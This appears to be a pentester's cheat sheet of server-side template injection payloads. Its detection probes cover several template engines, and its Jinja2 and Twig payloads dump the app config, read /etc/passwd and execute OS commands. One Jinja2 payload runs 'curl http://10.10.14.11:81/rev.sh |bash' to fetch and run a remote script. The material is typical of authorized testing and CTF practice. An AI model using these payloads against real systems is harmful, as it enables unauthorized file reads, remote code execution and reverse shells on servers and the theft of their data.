mcz3n | SSTI

Identify

# Check for return of 49
{{7*7}}
${7*7}
<%= 7*7 %>
${{7*7}}
#{7*7}
{7*7}
%{7*7}

Jinja2

# Config
{{ config.items() }}

# Globals
{{ self.__init__.__globals__.__builtins__ }}

# LFI
{{ self.__init__.__globals__.__builtins__.open("/etc/passwd").read() }}

# RCE
{{ self.__init__.__globals__.__builtins__.__import__('os').popen('id').read() }}

There are a few kinds of delimiters. The default Jinja delimiters are configured as follows:

{% ... %} for Statements
{{ ... }} for Expressions to print to the template output
{# ... #} for Comments not included in the template output

Below are payloads based on Statements inside templates instead of above expresssions.

# Basic check
{% print(7*7) %}

# RCE
{% if request['application']['__globals__']['__builtins__']['__import__']('os')['popen']('curl http://10.10.14.11:81/rev.sh |bash')['read']() == 'chiv' %} a {% endif %}

Twig

# Get info
{{ _self }}

# Read file
{{ "/etc/passwd"|file_excerpt(1,-1) }}

# RCE 
{{ ['id'] | filter('system') }}

More payloads at:https://github.com/swisskyrepo/PayloadsAllTheThings/blob/master/Server%20Side%20Template%20Injection/README.md